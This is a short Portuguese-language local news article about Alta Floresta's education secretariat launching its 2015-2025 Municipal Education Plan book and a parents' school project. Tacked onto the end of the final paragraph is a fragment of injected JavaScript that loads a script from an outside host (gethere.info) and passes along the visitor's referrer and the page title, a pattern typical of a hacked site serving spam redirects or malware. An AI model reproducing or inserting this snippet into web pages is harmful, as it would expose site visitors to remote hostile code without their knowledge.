Capa / Cidades / Secretaria de Educação lança livro do PME

Secretaria de Educação lança livro do PME

LIVRODionéia Martins

Já está tudo pronto para o lançamento do livro documento que discute a educação do município de Alta Floresta para os próximos 10 anos. O Plano Municipal de Educação (PME) 2015-2025, foi coordenado e elaborado pela Secretaria e Conselho Municipal de Educação de Alta Floresta.
O livro com 74 páginas é um instrumento responsável por nortear e apontar caminhos e estágios a serem alcançados pelo município. O PME foi elaborado a partir de várias reuniões de estudo, pré-conferencia que teve inicio em 2014 e finalizado em 2015 com a conferência municipal de educação e aprovado em 23 de junho pela Câmara Municipal de Alta Floresta.
Discutida em todas as escolas municipais, o plano municipal de educação do município é baseado no plano nacional e estadual de educação e adequado a realidade e necessidades de Alta Floresta.
A entrega oficial do Plano Municipal de Educação de Alta Floresta, será realizada nesta quinta-feira, 07, às 19h, no Centro Cultural de Alta Floresta, também acontecerá o lançamento do projeto “Escola de Pais”, uma parceria entre Secretaria Municipal de Educação e Programa FICAI.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top